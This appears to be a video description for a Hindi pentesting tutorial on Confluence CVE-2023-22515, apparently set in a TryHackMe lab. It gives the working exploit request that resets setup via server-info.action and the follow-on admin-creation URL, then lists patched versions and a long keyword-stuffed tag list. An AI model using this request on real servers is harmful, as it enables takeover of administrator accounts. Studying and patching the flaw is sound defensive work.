[HINDI] Confluence CVE-2023-22515 | Manual Exploit to get admin access Atlassian | PentestHint
![[HINDI] Confluence CVE-2023-22515 | Manual Exploit to get admin access Atlassian | PentestHint](https://i.ytimg.com/vi/2Zfh92oPxXE/hqdefault.jpg)
#CVE #atlassian #confluence #broekn #access #control #exploit #manual #VAPT #pentesthint #hindi #penetrationtesting #vulnerabilityassessment
On October 4th, 2023, Atlassian released a security advisory regarding CVE-2023-22515, a broken access control vulnerability, with an assigned CVSS score of 10.0. The vulnerability was introduced in version 8.0.0 of Confluence Server and Data Center editions and is present in versions less than 8.3.3, less than 8.4.3, less than 8.5.2. According to Atlassian, the vulnerability has already been exploited in the wild.
If we call setSetupComplete(false), we will effectively reenable the initial setup. Putting it all together, we can call that chain of getters/setters by accessing the following URL:
http://example.com/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
Now that we can access the initial setup once again, let’s browse to:
http://10.10.147.138:8090/setup/setupadministrator-start.action
All vulnerable instances should be upgraded to at least one of the following versions as soon as possible:
8.3.3
8.4.3
8.5.2
cve-2023-22515
confluence cve-2023-22515
confluence cve-2023-22515 tryhackme
cve-2023-38831
confluence
infosec
cybersecurity
web application security
access control flaws
data security
it security
vulnerability exploitation
confluence administration
cyber threats
web security
security best practices
it risk management
hacking prevention
zero day
atlassian confluence
vulnerability
defcon
critical vulnerability
remote code execution
rce
shell
lawrencesystems
cve 2023 4863
cyber security
webp vulnerability
webp vulnerability affected software
google chrome
microsoft windows
soc
security operations centers
application security
vulnerability management
vulnerability
ciso
basics of security
security
identity
endpoint
network
brodie robertson
brodie robertson linux
the linux experiment
brodie robertson arch linux
nvd
cve
curl
daniel stenberg
daniel stenberg curl
curl cve
vulnerability
exploit
manual exploit
hacker exploit
exploit manually
heartbleed exploit
manual
critical vulnerability
nmap vulnerability scan
nmap vulnerability scan kali
vulnerability scanning
heartbleed vulnerability explained
vulnerability testing
vulnerabality
nmap vulnerability scan windows
zero-day vulnerability
http method vulnerability
shellshock vulnerability
heartbleed vulnerablility explained
vulnerabiliyt
a03 vulnerbility